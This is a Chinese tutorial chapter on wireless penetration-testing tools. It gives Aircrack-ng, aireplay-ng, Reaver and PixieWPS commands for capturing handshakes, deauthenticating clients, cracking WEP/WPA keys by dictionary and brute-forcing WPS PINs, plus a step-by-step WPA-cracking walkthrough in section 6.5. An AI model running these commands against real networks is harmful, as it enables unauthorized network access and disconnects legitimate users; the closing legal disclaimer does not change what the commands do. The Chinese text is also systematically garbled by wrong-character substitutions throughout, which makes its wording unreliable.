在本章节中,咱们将学习一些罕用的无线网络浸透测试工具,如Aircrack-ng、Reaver等。咱们将尽量解说得具体、通俗易懂,并提供尽可能多的实例。

6.1 Aircrack-ng套件

Aircrack-ng是一个用于测试无线网络安全的工具集,包含捕捉数据包、破解WEP和WPA/WPA2-PSK密钥、创立和治理拜访点等性能。以下是Aircrack-ng套件中的一些次要工具:

6.1.1 airmon-ng

airmon-ng用于治理无线网卡的监督模式。监督模式容许无线网卡捕捉所有左近的无线流量,而不仅仅是与其连贯的网络。

启用监督模式:

airmon-ng start wlan0

此命令将启用名为wlan0的无线网卡的监督模式,并创立一个名为wlan0mon的新接口。

6.1.2 airodump-ng

airodump-ng用于捕捉无线网络的数据包,包含SSID、BSSID、信道、加密类型等信息。

扫描左近的无线网络:

airodump-ng wlan0mon

此命令将应用名为wlan0mon的监督接口扫描左近的无线网络,并显示SSID、BSSID、信道、加密类型等信息。

捕捉指标网络的数据包:

airodump-ng -c [channel] --bssid [BSSID] -w [output_file] wlan0mon

此命令将捕捉指定信道和BSSID的指标网络的数据包,并将其保留到output_file中。

6.1.3 aireplay-ng

aireplay-ng用于发送数据包以生成流量,有助于放慢破解WEP和WPA/WPA2-PSK密钥的过程。

执行WEP攻打:

aireplay-ng -3 -b [BSSID] wlan0mon

此命令将对指定BSSID的指标网络执行ARP申请重注入攻打,以生成足够的数据包进行WEP破解。

执行WPA/WPA2-PSK攻打:

aireplay-ng -0 1 -a [BSSID] -c [client_MAC] wlan0mon

此命令将对指定BSSID的指标网络发送解除认证数据包,迫使客户端从新认证并捕捉握手数据包。

6.1.4 aircrack-ng

aircrack-ng用于破解WEP和WPA/WPA2-PSK密钥。

破解WEP密钥:

aircrack-ng [output_file]-01.cap

此命令将尝试破解捕捉到的WEP数据包,以获取WEP密钥。

破解WPA/WPA2-PSK密钥:

aircrack-ng -w [wordlist] [output_file]-01.cap

此命令将应用字典文件wordlist尝试破解捕捉到的WPA/WPA2-PSK握手数据包,以获取WPA/WPA2-PSK密钥。

6.2 Reaver

Reaver是一个用于破解WPS PIN码的工具,进而获取WPA/WPA2-PSK密钥。Reaver利用WPS设计的破绽,通过暴力破解PIN码来实现攻打。

应用Reaver破解WPS PIN码:

reaver -i wlan0mon -b [BSSID] -vv

此命令将应用名为wlan0mon的监督接口,针对指定BSSID的指标网络,尝试破解WPS PIN码。

6.3 PixieWPS

PixieWPS是一个用于利用WPS破绽的工具,能够与Reaver一起应用,使WPS攻打更加高效。

应用Reaver和PixieWPS进行WPS攻打:

reaver -i wlan0mon -b [BSSID] -c [channel] -K 1 -vv

此命令将应用名为wlan0mon的监督接口,针对指定信道和BSSID的指标网络,尝试破解WPS PIN码,并应用PixieWPS进行高效攻打。

6.4 Wireshark

Wireshark是一个功能强大的网络协议分析器,能够用于捕捉和剖析数据包,包含无线数据包。

应用Wireshark捕捉无线数据包:

  1. 关上Wireshark。
  2. 抉择名为wlan0mon的监督接口。
  3. 开始捕捉数据包。

6.5 实战案例

以下是一个应用Aircrack-ng套件执行WPA/WPA2-PSK攻打的实战案例:

  1. 启用监督模式:
airmon-ng start wlan0
  1. 扫描左近的无线网络:
airodump-ng wlan0mon

找到指标网络的BSSID和信道,例如BSSID为12:34:56:78:9A:BC,信道为6。

  1. 捕捉指标网络的数据包:
airodump-ng -c 6 --bssid 12:34:56:78:9A:BC -w output wlan0mon
  1. 发送解除认证数据包以捕捉握手数据包:
aireplay-ng -0 1 -a 12:34:56:78:9A:BC -c 01:23:45:67:89:AB wlan0mon

其中,01:23:45:67:89:AB是指标网络客户端的MAC地址。

  1. 应用字典文件破解握手数据包:
aircrack-ng -w wordlist.txt output-01.cap

如果破解胜利,将显示WPA/WPA2-PSK密钥。

请留神,无线网络浸透测试应该在非法范畴内进行。在没有受权的状况下攻打别人的无线网络是守法的。在学习和实际过程中,请确保本人恪守当地法律法规,免得触犯法律。

总结:在本章节中,咱们具体介绍了无线网络浸透测试工具,如Aircrack-ng、Reaver等,并提供了实例来帮忙你更好地了解这些工具的应用办法。心愿这些内容对你有所帮忙,让你可能把握无线网络浸透测试的基本技能。
举荐浏览:

https://mp.weixin.qq.com/s/dV2JzXfgjDdCmWRmE0glDA

https://mp.weixin.qq.com/s/an83QZOWXHqll3SGPYTL5g